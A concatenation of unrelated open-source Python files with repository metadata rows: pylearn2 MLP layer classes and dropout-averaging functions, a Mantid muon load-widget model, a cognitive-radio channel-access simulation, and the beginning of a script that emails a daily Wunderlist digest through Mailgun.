A DenseDesignMatrix with a targets field `y`
kwargs : dict
Extra arguments to `beta_from_design`
Returns
-------
beta : ndarray
A 1-D vector containing the marginal precision of the *targets* in
`dataset`.
"""
return beta_from_design(dataset.y, **kwargs)
def beta_from_features(dataset, **kwargs):
"""
Returns the marginal precision of the features in a dataset.
Parameters
----------
dataset : DenseDesignMatrix
The dataset to compute the precision on.
kwargs : dict
Passed through to `beta_from_design`
Returns
-------
beta : ndarray
Vector of precision values for each feature in `dataset`
"""
return beta_from_design(dataset.X, **kwargs)
def mean_of_targets(dataset):
"""
Returns the mean of the targets in a dataset.
Parameters
----------
dataset : DenseDesignMatrix
Returns
-------
mn : ndarray
A 1-D vector with entry i giving the mean of target i
"""
return dataset.y.mean(axis=0)
class PretrainedLayer(Layer):
"""
A layer whose weights are initialized, and optionally fixed,
based on prior training.
Parameters
----------
layer_content : Model
Should implement "upward_pass" (RBM and Autoencoder do this)
freeze_params: bool
If True, regard layer_conent's parameters as fixed
If False, they become parameters of this layer and can be
fine-tuned to optimize the MLP's cost function.
"""
def __init__(self, layer_name, layer_content, freeze_params=False):
super(PretrainedLayer, self).__init__()
self.__dict__.update(locals())
del self.self
@wraps(Layer.set_input_space)
def set_input_space(self, space):
assert self.get_input_space() == space
@wraps(Layer.get_params)
def get_params(self):
if self.freeze_params:
return []
return self.layer_content.get_params()
@wraps(Layer.get_input_space)
def get_input_space(self):
return self.layer_content.get_input_space()
@wraps(Layer.get_output_space)
def get_output_space(self):
return self.layer_content.get_output_space()
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
return OrderedDict([])
@wraps(Layer.fprop)
def fprop(self, state_below):
return self.layer_content.upward_pass(state_below)
class CompositeLayer(Layer):
"""
A Layer that runs several layers in parallel. Its default behavior
is to pass the layer's input to each of the components.
Alternatively, it can take a CompositeSpace as an input and a mapping
from inputs to layers i.e. providing each component layer with a
subset of the inputs.
Parameters
----------
layer_name : str
The name of this layer
layers : tuple or list
The component layers to run in parallel.
inputs_to_layers : dict mapping int to list of ints, optional
Can only be used if the input space is a CompositeSpace.
If inputs_to_layers[i] contains j, it means input i will
be given as input to component j. Note that if multiple inputs are
passed on to e.g. an inner CompositeLayer, the same order will
be maintained. If the list is empty, the input will be discarded.
If an input does not appear in the dictionary, it will be given to
all components.
Examples
--------
>>> composite_layer = CompositeLayer(
... layer_name='composite_layer',
... layers=[Tanh(7, 'h0', 0.1), Sigmoid(5, 'h1', 0.1)],
... inputs_to_layers={
... 0: [1],
... 1: [0]
... })
This CompositeLayer has a CompositeSpace with 2 subspaces as its
input space. The first input is given to the Sigmoid layer, the second
input is given to the Tanh layer.
>>> wrapper_layer = CompositeLayer(
... layer_name='wrapper_layer',
... layers=[Linear(9, 'h2', 0.1),
... composite_layer,
... Tanh(7, 'h3', 0.1)],
... inputs_to_layers={
... 0: [1],
... 2: []
... })
This CompositeLayer takes 3 inputs. The first one is given to the
inner CompositeLayer. The second input is passed on to each component
layer i.e. to the Tanh, Linear as well as CompositeLayer. The third
input is discarded. Note that the inner CompositeLayer wil receive
the inputs with the same ordering i.e. [0, 1], and never [1, 0].
"""
def __init__(self, layer_name, layers, inputs_to_layers=None):
self.num_layers = len(layers)
if inputs_to_layers is not None:
if not isinstance(inputs_to_layers, dict):
raise TypeError("CompositeLayer expected inputs_to_layers to "
"be dict, got " + str(type(inputs_to_layers)))
self.inputs_to_layers = OrderedDict()
for key in sorted(inputs_to_layers):
assert isinstance(key, py_integer_types)
value = inputs_to_layers[key]
assert is_iterable(value)
assert all(isinstance(v, py_integer_types) for v in value)
# Check 'not value' to support case of empty list
assert not value or all(0 <= v < self.num_layers
for v in value)
self.inputs_to_layers[key] = sorted(value)
super(CompositeLayer, self).__init__()
self.__dict__.update(locals())
del self.self
@property
def routing_needed(self):
return self.inputs_to_layers is not None
@wraps(Layer.set_input_space)
def set_input_space(self, space):
if not isinstance(space, CompositeSpace):
if self.inputs_to_layers is not None:
raise ValueError("CompositeLayer received an inputs_to_layers "
"mapping, but does not have a CompositeSpace "
"as its input space, so there is nothing to "
"map. Received " + str(space) + " as input "
"space.")
elif self.routing_needed:
if not max(self.inputs_to_layers) < len(space.components):
raise ValueError("The inputs_to_layers mapping of "
"CompositeSpace contains they key " +
str(max(self.inputs_to_layers)) + " "
"(0-based) but the input space only "
"contains " + str(self.num_layers) + " "
"layers.")
# Invert the dictionary
self.layers_to_inputs = OrderedDict()
for i in xrange(self.num_layers):
inputs = []
for j in xrange(len(space.components)):
if j in self.inputs_to_layers:
if i in self.inputs_to_layers[j]:
inputs.append(j)
else:
inputs.append(j)
self.layers_to_inputs[i] = inputs
for i, layer in enumerate(self.layers):
if self.routing_needed and i in self.layers_to_inputs:
cur_space = space.restrict(self.layers_to_inputs[i])
else:
cur_space = space
layer.set_input_space(cur_space)
self.input_space = space
self.output_space = CompositeSpace(tuple(layer.get_output_space()
for layer in self.layers))
self._target_space = CompositeSpace(tuple(layer.get_target_space()
for layer in self.layers))
@wraps(Layer.get_params)
def get_params(self):
rval = []
for layer in self.layers:
rval = safe_union(layer.get_params(), rval)
return rval
@wraps(Layer.fprop)
def fprop(self, state_below):
rvals = []
for i, layer in enumerate(self.layers):
if self.routing_needed and i in self.layers_to_inputs:
cur_state_below = [state_below[j]
for j in self.layers_to_inputs[i]]
# This is to mimic the behavior of CompositeSpace's restrict
# method, which only returns a CompositeSpace when the number
# of components is greater than 1
if len(cur_state_below) == 1:
cur_state_below, = cur_state_below
else:
cur_state_below = state_below
rvals.append(layer.fprop(cur_state_below))
return tuple(rvals)
def _weight_decay_aggregate(self, method_name, coeff):
if isinstance(coeff, py_float_types):
return T.sum([getattr(layer, method_name)(coeff)
for layer in self.layers])
elif is_iterable(coeff):
assert all(layer_coeff >= 0 for layer_coeff in coeff)
return T.sum([getattr(layer, method_name)(layer_coeff) for
layer, layer_coeff in safe_zip(self.layers, coeff)
if layer_coeff > 0], dtype=config.floatX)
else:
raise TypeError("CompositeLayer's " + method_name + " received "
"coefficients of type " + str(type(coeff)) + " "
"but must be provided with a float or list/tuple")
def get_weight_decay(self, coeff):
"""
Provides an expression for a squared L2 penalty on the weights,
which is the weighted sum of the squared L2 penalties of the layer
components.
Parameters
----------
coeff : float or tuple/list
The coefficient on the squared L2 weight decay penalty for
this layer. If a single value is provided, this coefficient is
used for each component layer. If a list of tuple of
coefficients is given they are passed on to the component
layers in the given order.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the squared L2 weight decay penalty term for
this layer.
"""
return self._weight_decay_aggregate('get_weight_decay', coeff)
def get_l1_weight_decay(self, coeff):
"""
Provides an expression for a squared L1 penalty on the weights,
which is the weighted sum of the squared L1 penalties of the layer
components.
Parameters
----------
coeff : float or tuple/list
The coefficient on the L1 weight decay penalty for this layer.
If a single value is provided, this coefficient is used for
each component layer. If a list of tuple of coefficients is
given they are passed on to the component layers in the
given order.
Returns
-------
weight_decay : theano.gof.Variable
An expression for the L1 weight decay penalty term for this
layer.
"""
return self._weight_decay_aggregate('get_l1_weight_decay', coeff)
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
return sum(layer.cost(Y_elem, Y_hat_elem)
for layer, Y_elem, Y_hat_elem in
safe_zip(self.layers, Y, Y_hat))
@wraps(Layer.set_mlp)
def set_mlp(self, mlp):
super(CompositeLayer, self).set_mlp(mlp)
for layer in self.layers:
layer.set_mlp(mlp)
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = OrderedDict()
# TODO: reduce redundancy with fprop method
for i, layer in enumerate(self.layers):
if self.routing_needed and i in self.layers_to_inputs:
cur_state_below = [state_below[j]
for j in self.layers_to_inputs[i]]
# This is to mimic the behavior of CompositeSpace's restrict
# method, which only returns a CompositeSpace when the number
# of components is greater than 1
if len(cur_state_below) == 1:
cur_state_below, = cur_state_below
else:
cur_state_below = state_below
if state is not None:
cur_state = state[i]
else:
cur_state = None
if targets is not None:
cur_targets = targets[i]
else:
cur_targets = None
d = layer.get_layer_monitoring_channels(
cur_state_below, cur_state, cur_targets)
for key in d:
rval[layer.layer_name + '_' + key] = d[key]
return rval
@wraps(Model._modify_updates)
def _modify_updates(self, updates):
for layer in self.layers:
layer.modify_updates(updates)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
return get_lr_scalers_from_layers(self)
class FlattenerLayer(Layer):
"""
A wrapper around a different layer that flattens
the original layer's output.
The cost works by unflattening the target and then
calling the wrapped Layer's cost.
This is mostly intended for use with CompositeLayer as the wrapped
Layer, and is mostly useful as a workaround for theano not having
a TupleVariable with which to represent a composite target.
There are obvious memory, performance, and readability issues with doing
this, so really it would be better for theano to support TupleTypes.
See pylearn2.sandbox.tuple_var and the theano-dev e-mail thread
"TupleType".
Parameters
----------
raw_layer : Layer
Layer that FlattenerLayer wraps.
"""
def __init__(self, raw_layer):
super(FlattenerLayer, self).__init__()
self.__dict__.update(locals())
del self.self
self.layer_name = raw_layer.layer_name
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.raw_layer.set_input_space(space)
total_dim = self.raw_layer.get_output_space().get_total_dimension()
self.output_space = VectorSpace(total_dim)
@wraps(Layer.get_input_space)
def get_input_space(self):
return self.raw_layer.get_input_space()
@wraps(Layer.get_monitoring_channels)
def get_monitoring_channels(self, data):
return self.raw_layer.get_monitoring_channels(data)
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
raw_space = self.raw_layer.get_output_space()
state = raw_space.undo_format_as(state,
self.get_output_space())
if targets is not None:
targets = self.get_target_space().format_as(
targets, self.raw_layer.get_target_space())
return self.raw_layer.get_layer_monitoring_channels(
state_below=state_below,
state=state,
targets=targets
)
@wraps(Layer.get_monitoring_data_specs)
def get_monitoring_data_specs(self):
return self.raw_layer.get_monitoring_data_specs()
@wraps(Layer.get_params)
def get_params(self):
return self.raw_layer.get_params()
@wraps(Layer.get_weights)
def get_weights(self):
return self.raw_layer.get_weights()
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeffs):
return self.raw_layer.get_weight_decay(coeffs)
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeffs):
return self.raw_layer.get_l1_weight_decay(coeffs)
@wraps(Layer.set_batch_size)
def set_batch_size(self, batch_size):
self.raw_layer.set_batch_size(batch_size)
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
self.raw_layer.modify_updates(updates)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
return self.raw_layer.get_lr_scalers()
@wraps(Layer.fprop)
def fprop(self, state_below):
raw = self.raw_layer.fprop(state_below)
return self.raw_layer.get_output_space().format_as(raw,
self.output_space)
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
raw_space = self.raw_layer.get_output_space()
target_space = self.output_space
raw_Y = target_space.format_as(Y, raw_space)
raw_Y_hat = raw_space.undo_format_as(Y_hat, target_space)
raw_space.validate(raw_Y_hat)
return self.raw_layer.cost(raw_Y, raw_Y_hat)
@wraps(Layer.set_mlp)
def set_mlp(self, mlp):
super(FlattenerLayer, self).set_mlp(mlp)
self.raw_layer.set_mlp(mlp)
@wraps(Layer.get_weights)
def get_weights(self):
return self.raw_layer.get_weights()
class WindowLayer(Layer):
"""
Layer used to select a window of an image input.
The input of the layer must be Conv2DSpace.
Parameters
----------
layer_name : str
A name for this layer.
window : tuple
A four-tuple of ints indicating respectively
the top left x and y position, and
the bottom right x and y position of the window.
"""
def __init__(self, layer_name, window):
super(WindowLayer, self).__init__()
self.__dict__.update(locals())
del self.self
if window[0] < 0 or window[0] > window[2] or \
window[1] < 0 or window[1] > window[3]:
raise ValueError("WindowLayer: bad window parameter")
@wraps(Layer.fprop)
def fprop(self, state_below):
extracts = [slice(None), slice(None), slice(None), slice(None)]
extracts[self.rows] = slice(self.window[0], self.window[2] + 1)
extracts[self.cols] = slice(self.window[1], self.window[3] + 1)
extracts = tuple(extracts)
return state_below[extracts]
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
if not isinstance(space, Conv2DSpace):
raise TypeError("The input to a Window layer should be a "
"Conv2DSpace, but layer " + self.layer_name +
" got " + str(type(self.input_space)))
axes = space.axes
self.rows = axes.index(0)
self.cols = axes.index(1)
nrows = space.shape[0]
ncols = space.shape[1]
if self.window[2] + 1 > nrows or self.window[3] + 1 > ncols:
raise ValueError("WindowLayer: bad window shape. "
"Input is [" + str(nrows) + ", " +
str(ncols) + "], "
"but layer " + self.layer_name + " has window "
+ str(self.window))
self.output_space = Conv2DSpace(
shape=[self.window[2] - self.window[0] + 1,
self.window[3] - self.window[1] + 1],
num_channels=space.num_channels,
axes=axes)
@wraps(Layer.get_params)
def get_params(self):
return []
@wraps(Layer.get_monitoring_channels)
def get_monitoring_channels(self):
return []
def generate_dropout_mask(mlp, default_include_prob=0.5,
input_include_probs=None, rng=(2013, 5, 17)):
"""
Generate a dropout mask (as an integer) given inclusion
probabilities.
Parameters
----------
mlp : object
An MLP object.
default_include_prob : float, optional
The probability of including an input to a hidden
layer, for layers not listed in `input_include_probs`.
Default is 0.5.
input_include_probs : dict, optional
A dictionary mapping layer names to probabilities
of input inclusion for that layer. Default is `None`,
in which `default_include_prob` is used for all
layers.
rng : RandomState object or seed, optional
A `numpy.random.RandomState` object or a seed used to
create one.
Returns
-------
mask : int
An integer indexing a dropout mask for the network,
drawn with the appropriate probability given the
inclusion probabilities.
"""
if input_include_probs is None:
input_include_probs = {}
if not hasattr(rng, 'uniform'):
rng = np.random.RandomState(rng)
total_units = 0
mask = 0
for layer in mlp.layers:
if layer.layer_name in input_include_probs:
p = input_include_probs[layer.layer_name]
else:
p = default_include_prob
for _ in xrange(layer.get_input_space().get_total_dimension()):
mask |= int(rng.uniform() < p) << total_units
total_units += 1
return mask
def sampled_dropout_average(mlp, inputs, num_masks,
default_input_include_prob=0.5,
input_include_probs=None,
default_input_scale=2.,
input_scales=None,
rng=(2013, 5, 17),
per_example=False):
"""
Take the geometric mean over a number of randomly sampled
dropout masks for an MLP with softmax outputs.
Parameters
----------
mlp : object
An MLP object.
inputs : tensor_like
A Theano variable representing a minibatch appropriate
for fpropping through the MLP.
num_masks : int
The number of masks to sample.
default_input_include_prob : float, optional
The probability of including an input to a hidden
layer, for layers not listed in `input_include_probs`.
Default is 0.5.
input_include_probs : dict, optional
A dictionary mapping layer names to probabilities
of input inclusion for that layer. Default is `None`,
in which `default_include_prob` is used for all
layers.
default_input_scale : float, optional
The amount to scale input in dropped out layers.
input_scales : dict, optional
A dictionary mapping layer names to constants by
which to scale the input.
rng : RandomState object or seed, optional
A `numpy.random.RandomState` object or a seed used to
create one.
per_example : bool, optional
If `True`, generate a different mask for every single
test example, so you have `num_masks` per example
instead of `num_mask` networks total. If `False`,
`num_masks` masks are fixed in the graph.
Returns
-------
geo_mean : tensor_like
A symbolic graph for the geometric mean prediction of
all the networks.
"""
if input_include_probs is None:
input_include_probs = {}
if input_scales is None:
input_scales = {}
if not hasattr(rng, 'uniform'):
rng = np.random.RandomState(rng)
mlp._validate_layer_names(list(input_include_probs.keys()))
mlp._validate_layer_names(list(input_scales.keys()))
if per_example:
outputs = [mlp.dropout_fprop(inputs, default_input_include_prob,
input_include_probs,
default_input_scale,
input_scales)
for _ in xrange(num_masks)]
else:
masks = [generate_dropout_mask(mlp, default_input_include_prob,
input_include_probs, rng)
for _ in xrange(num_masks)]
outputs = [mlp.masked_fprop(inputs, mask, None,
default_input_scale, input_scales)
for mask in masks]
return geometric_mean_prediction(outputs)
def exhaustive_dropout_average(mlp, inputs, masked_input_layers=None,
default_input_scale=2., input_scales=None):
"""
Take the geometric mean over all dropout masks of an
MLP with softmax outputs.
Parameters
----------
mlp : object
An MLP object.
inputs : tensor_like
A Theano variable representing a minibatch appropriate
for fpropping through the MLP.
masked_input_layers : list, optional
A list of layer names whose input should be masked.
Default is all layers (including the first hidden
layer, i.e. mask the input).
default_input_scale : float, optional
The amount to scale input in dropped out layers.
input_scales : dict, optional
A dictionary mapping layer names to constants by
which to scale the input.
Returns
-------
geo_mean : tensor_like
A symbolic graph for the geometric mean prediction
of all exponentially many masked subnetworks.
Notes
-----
This is obviously exponential in the size of the network,
don't do this except for tiny toy networks.
"""
if masked_input_layers is None:
masked_input_layers = mlp.layer_names
mlp._validate_layer_names(masked_input_layers)
if input_scales is None:
input_scales = {}
mlp._validate_layer_names(input_scales.keys())
if any(key not in masked_input_layers for key in input_scales):
not_in = [key for key in input_scales
if key not in mlp.layer_names]
raise ValueError(", ".join(not_in) + " in input_scales"
" but not masked")
num_inputs = mlp.get_total_input_dimension(masked_input_layers)
outputs = [mlp.masked_fprop(inputs, mask, masked_input_layers,
default_input_scale, input_scales)
for mask in xrange(2 ** num_inputs)]
return geometric_mean_prediction(outputs)
def geometric_mean_prediction(forward_props):
"""
Take the geometric mean over all dropout masks of an
MLP with softmax outputs.
Parameters
----------
forward_props : list
A list of Theano graphs corresponding to forward
propagations through the network with different
dropout masks.
Returns
-------
geo_mean : tensor_like
A symbolic graph for the geometric mean prediction
of all exponentially many masked subnetworks.
Notes
-----
This is obviously exponential in the size of the network,
don't do this except for tiny toy networks.
"""
presoftmax = []
for out in forward_props:
assert isinstance(out.owner.op, T.nnet.Softmax)
assert len(out.owner.inputs) == 1
presoftmax.append(out.owner.inputs[0])
average = reduce(operator.add, presoftmax) / float(len(presoftmax))
return T.nnet.softmax(average)
class BadInputSpaceError(TypeError):
"""
An error raised by an MLP layer when set_input_space is given an
object that is not one of the Spaces that layer supports.
"""
def get_lr_scalers_from_layers(owner):
"""
Get the learning rate scalers for all member layers of
`owner`.
Parameters
----------
owner : Model
Any Model with a `layers` field
Returns
-------
lr_scalers : OrderedDict
A dictionary mapping parameters of `owner` to learning
rate scalers.
"""
rval = OrderedDict()
params = owner.get_params()
for layer in owner.layers:
contrib = layer.get_lr_scalers()
assert isinstance(contrib, OrderedDict)
# No two layers can contend to scale a parameter
assert not any([key in rval for key in contrib])
# Don't try to scale anything that's not a parameter
assert all([key in params for key in contrib])
rval.update(contrib)
assert all([isinstance(val, float) for val in rval.values()])
return rval
| bsd-3-clause | -8,657,553,449,295,059,000 | 33.730232 | 79 | 0.554054 | false |
mganeva/mantid | scripts/Muon/GUI/MuonAnalysis/load_widget/load_widget_model.py | 1 | 1513 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
from __future__ import (absolute_import, division, print_function)
from Muon.GUI.Common.muon_load_data import MuonLoadData
class LoadWidgetModel(object):
"""
The model is responsible for storing the currently loaded run or runs
(both the nun numbers, filenames and workspaces) as well as loading new runs using a separate loading thread.
"""
def __init__(self, loaded_data_store=MuonLoadData(), muon_context=None):
self._loaded_data_store = loaded_data_store
self._context = muon_context
def add_muon_data(self, filename, workspace, run):
self._loaded_data_store.add_data(run=run, filename=filename, workspace=workspace)
def clear_data(self):
self._loaded_data_store.clear()
self._context.current_runs = []
def is_filename_loaded(self, filename):
return self._loaded_data_store.contains(filename=filename)
def is_run_loaded(self, run):
return self._loaded_data_store.contains(run=run)
@property
def workspaces(self):
return self._context.current_workspaces
@property
def runs(self):
return self._context.current_runs
@property
def filenames(self):
return self._context.current_filenames
| gpl-3.0 | 1,026,091,008,242,188,000 | 32.622222 | 113 | 0.693985 | false |
maemre/rasim | sim.py | 1 | 10863 | #!/usr/bin/env python
# Holy import!
from __future__ import division
from numpy import *
from matplotlib import pyplot as P
from agent import OptHighestSNR, RandomChannel, IndividualQ, FixChannel
from channel.simple import SimpleChannel
from traffic.simple import SimpleTraffic
from environment import Environment
import os
# simulation parameters:
from params import *
from args import argv
# create data-output directory
output_dir = os.path.join(argv.output_dir, prefix)
try:
os.mkdir(argv.output_dir)
except OSError:
pass
try:
os.mkdir(output_dir)
except OSError:
pass
# generate channel-related stuff
# goodness of channels
goodness = concatenate((ones(N_good_channel), zeros(N_channel - N_good_channel)))
random.shuffle(goodness)
# channel generator
def gen_chan(i):
ch = noise['bad']
if goodness[i]:
ch = noise['good']
return SimpleChannel(base_freq + chan_bw * i, **ch)
def init_state(i):
# disk point picking - http://mathworld.wolfram.com/DiskPointPicking.html
r = sqrt(random.rand())*r_init
theta = random.rand()*2*pi
return {
'state': (random.randint(0, N_channel), random.randint(0, B)),
'x': r*cos(theta),
'y':r*sin(theta),
'id': i,
'speed': 0 if i < N_stationary_agent else 30. / 3.6 * t_slot # 30 kph
}
if argv.agents is None:
print 'No agent type is specified. Simulation cannot run. For details run rasim with "--help" option'
exit(1)
agent_types = []
for i in [RandomChannel, IndividualQ, OptHighestSNR]: # + [FixChannel, OptHighestSNR]
if i.__name__ in argv.agents:
agent_types.append(i)
paths = {}
for a in agent_types:
paths[a] = os.path.join(output_dir, a.__name__)
try:
os.mkdir(paths[a])
except OSError:
pass
# init statistics
avg_energies = zeros([len(agent_types), N_agent, t_total])
en_type = zeros([len(agent_types), t_total])
avg_bits = zeros([len(agent_types), N_agent, t_total])
bits_type = zeros([len(agent_types), t_total], dtype=int_)
en_idle = zeros([len(agent_types), N_agent, t_total])
en_sense = zeros([len(agent_types), N_agent, t_total])
en_sw = zeros([len(agent_types), N_agent, t_total])
en_tx = zeros([len(agent_types), N_agent, t_total])
buf_overflow = zeros([len(agent_types), N_agent, t_total], dtype=int_)
buf_levels = zeros([len(agent_types), N_agent, t_total], dtype=int_)
init_positions = zeros([len(agent_types), N_runs, N_agent, 2])
last_positions = zeros([len(agent_types), N_runs, N_agent, 2])
#############
# Arrays below are reused for each agent type and their values are saved per agent ype for
# small memory footprint!!
#############
# Channel traffic record. 0 = no traffic, 1 = PU traffic
channel_traf = zeros([N_channel, N_runs, t_total], dtype=int_)
# Agent transmission record. 0..N_channel-1 = transimt over given channel, N_channel = idle
# a huge matrix indeed
transmissions = zeros([N_runs, N_agent, t_total])
def run_simulation(agent_type, agent_no):
global avg_energies, en_type, avg_bits, bits_type, buf_overflow
# channels themselves
channels = [gen_chan(i) for i in xrange(N_channel)]
# channel traffics
traffics = [SimpleTraffic() for i in xrange(N_channel)]
env = Environment(channels, traffics, pd=0.9, pf=0.1)
if argv.verbose or not batch_run:
print 'Agent type:', agent_type.__name__
for n_run in xrange(N_runs):
# generate agents
agents = [agent_type(env, init_state(i)) for i in xrange(N_agent)]
env.set_agents(agents)
init_positions[agent_no, n_run] = [(a.x, a.y) for a in agents]
energies = zeros([N_agent, t_total])
bits = zeros([N_agent, t_total])
if argv.verbose or not batch_run:
print "Run #%d of %d(agent), %d of %d(total)" % (n_run + 1, N_runs, n_run + agent_no * N_runs + 1, N_runs * len(agent_types))
rates = [0,0,0,0,0]
for t in xrange(t_total):
env.next_slot()
channel_traf[:,n_run,t] = env.t_state
# get actions
actions = [a.act_then_idle() for a in agents]
# collect statistics for buffer overflow and buffer levels
for i, a in enumerate(agents):
buf_overflow[agent_no, i, t] = int(a.buf_overflow)
buf_levels[agent_no, i, t] += B - a.B_empty
# collisions per channel where,
# N_agent: PU collision, (0..N_agent-1): SU collision with ID
# -1: No collision
collisions = [N_agent if traffic else -1 for traffic in env.t_state]
collided = [False] * N_agent
for i, a in enumerate(actions):
if a['action'] == ACTION.TRANSMIT:
if collisions[a['channel']] == N_agent:
# collision with PU, mark agent as collided
collided[i] = True
rates[4] += 1
elif collisions[a['channel']] >= 0:
# collision with SU, mark both agents as collided
collided[i] = collided[collisions[a['channel']]] = True
else:
# no collision *yet*
collisions[a['channel']] = i
transmissions[n_run, i, t] = a['channel']
else:
transmissions[n_run, i, t] = N_channel
# For each agent compute transmission successes and report
# transmission success/failure to agent
for i, a in enumerate(agents):
# collect energy usage statistics
energies[i, t] = a.E_slot
en_type[agent_no, t] += a.E_slot
en_idle[agent_no, i, t] += a.E_idle
en_sense[agent_no, i, t] += a.E_sense
en_tx[agent_no, i, t] += a.E_tx
en_sw[agent_no, i, t] += a.E_sw
act = actions[i]
# send feedback to idle agents too
if act['action'] == ACTION.IDLE:
a.feedback(False, False, idle=True)
# if collision occurred, report collusion
if collided[i]:
a.feedback(collision=True, success=False)
rates[0] += 1
continue
if act['action'] != ACTION.TRANSMIT:
rates[3] += 1
continue
ch = env.channels[act['channel']]
# no collision, check transmission success by channel quality
pkt_sent = ch.transmission_successes(act['power'], act['bitrate'], act['pkt_size'], act['n_pkt'], a.x, a.y)
# give feedback
if pkt_sent == 0:
a.feedback(collision=False, success=False)
else:
a.feedback(collision=False, success=True, N_pkt=pkt_sent)
rates[1] += pkt_sent * 1.0 / act['n_pkt']
rates[2] += act['n_pkt'] - pkt_sent
# collect bit transmission statistics
bits[i, t] = pkt_sent * act['pkt_size']
bits_type[agent_no, t] += pkt_sent * act['pkt_size']
# save energies
#savetxt('energy_%d.txt' % n_run, energies)
# take averages
avg_energies[agent_no] += energies
avg_bits[agent_no] += bits
# print stats
rates[4] = rates[4] / (t_total * N_channel) * 100
if argv.verbose or not batch_run:
print "Collisions: %d\nSuccesses: %f\nLost in Channel: %d\nIdle: %d\n%%PU Collisions: %f" % tuple(rates)
print "%Success:", rates[1]/(t_total*N_agent - rates[3]) * 100
print "%Collided channels:", rates[0]/(t_total*N_channel) * 100
print
last_positions[agent_no, n_run] = [(a.x, a.y) for a in agents]
# save statistics
save(os.path.join(output_dir, agent_type.__name__, 'channel_traf.npy'), channel_traf)
save(os.path.join(output_dir, agent_type.__name__, 'transmissions.npy'), transmissions)
for i, agent_type in enumerate(agent_types):
run_simulation(agent_type, i)
buf_levels /= N_runs
avg_energies /= N_runs
avg_bits /= N_runs
en_idle /= N_runs
en_sense /= N_runs
en_tx /= N_runs
en_sw /= N_runs
# give outputs
if not batch_run:
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(cumsum(en_type[i])/cumsum(bits_type[i]), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('Energy/bit (cumulative)')
P.title('Efficiency (Cumulative Energy/bit) vs Time')
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(convolve(buf_overflow[i].sum(axis=0)/(N_agent*1.0), [1./7]*7), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('# of buffer overflows (7-point avg, per agent)')
P.title('Buffer Overflows vs Time')
P.figure()
P.bar(arange(len(agent_types)), buf_overflow.sum(axis=(1,2)))
P.legend()
P.xlabel('Agent Type')
P.ylabel('# of buffer overflows (avg, per agent)')
P.xticks(arange(len(agent_types) + 1), [x.__name__ for x in agent_types] + [''])
P.title('Buffer overflows vs Agent Type')
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(buf_levels[i].sum(axis=0)/(N_agent*1.0), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('buffer occupancy')
P.title('Buffer Occupancy (avg) vs Time')
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(cumsum(en_idle[i].sum(axis=0) / N_agent), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('Avg Idle Energy (cumulative)')
P.title('Idle Energy vs Time')
P.show()
print "Throughput:"
for i, agent_type in enumerate(agent_types):
print "\t%s:\t%f" % (agent_type.__name__, sum(bits_type[i]))
# save statistics
# save agent types
with open(os.path.join(output_dir, 'agents.txt'), 'w') as f:
f.write('\n'.join(x.__name__ for x in agent_types))
save(os.path.join(output_dir, 'avg_energies.npy'), avg_energies)
save(os.path.join(output_dir, 'avg_bits.npy'), avg_bits)
save(os.path.join(output_dir, 'en_idle.npy'), en_idle)
save(os.path.join(output_dir, 'en_sense.npy'), en_sense)
save(os.path.join(output_dir, 'en_tx.npy'), en_tx)
save(os.path.join(output_dir, 'en_sw.npy'), en_sw)
save(os.path.join(output_dir, 'en_type.npy'), en_type)
save(os.path.join(output_dir, 'buf_overflow.npy'), buf_overflow)
save(os.path.join(output_dir, 'buf_levels.npy'), buf_overflow)
save(os.path.join(output_dir, 'init_positions.npy'), init_positions)
save(os.path.join(output_dir, 'last_positions.npy'), last_positions) | apache-2.0 | 5,194,816,224,260,189,000 | 38.220217 | 137 | 0.58308 | false |
AyeJayTwo/DailyWunderlist | wunderlist.py | 1 | 4315 | import requests
import json
from datetime import date
from datetime import datetime
from datetime import timedelta
#Application Details
# with open('config.json') as json_file:
# config_data = json.load(json_file)
# client_id = config_data['client_id']
# redirect_uri = config_data['redirect_uri']
# client_secret = config_data['client_secret']
# state = config_data['state']
# code = config_data['code']
# token = config_data['token']
# mailgun_api = config_data['mailgun_api']
# mailgun_key = config_data['mailgun_key']
# to_name = config_data['to_name']
# to_email = config_data['to_email']
def parse_auth_obj(filename):
with open(filename) as json_file:
config_data = json.load(json_file)
return config_data
def get_wunderlists(config):
list_request = {'client_id':config['client_id'],
'client_secret':config['client_secret'],
'code':config['code'],
'grant_type': 'authorization_code',
'redirect_uri':config['redirect_uri'],
'access_token':config['token']}
wunderlists = requests.get("https://a.wunderlist.com/api/v1/lists", params = list_request)
wunderlist_lists = wunderlists.json()
return wunderlist_lists
def sendEmail(config, text):
return requests.post(
'https://api.mailgun.net/v3/'+config_data['mailgun_api']+'/messages',
auth=("api", config_data['mailgun_key']),
data={"from": 'Daily Wunderlist Email <mailgun@'+config_data['mailgun_api']+'>',
"to": [config_data['to_name'], config_data['to_email']],
"subject": 'Your Daily Wunderlist Digest %s'%todayDatePrint(),
"text": text, "html":text})
def get_tasks(list_id, config):
config['list'] = list_id
task_request = {'client_id':config['client_id'],
'client_secret':config['client_secret'],
'code':config['code'],
'grant_type': 'authorization_code',
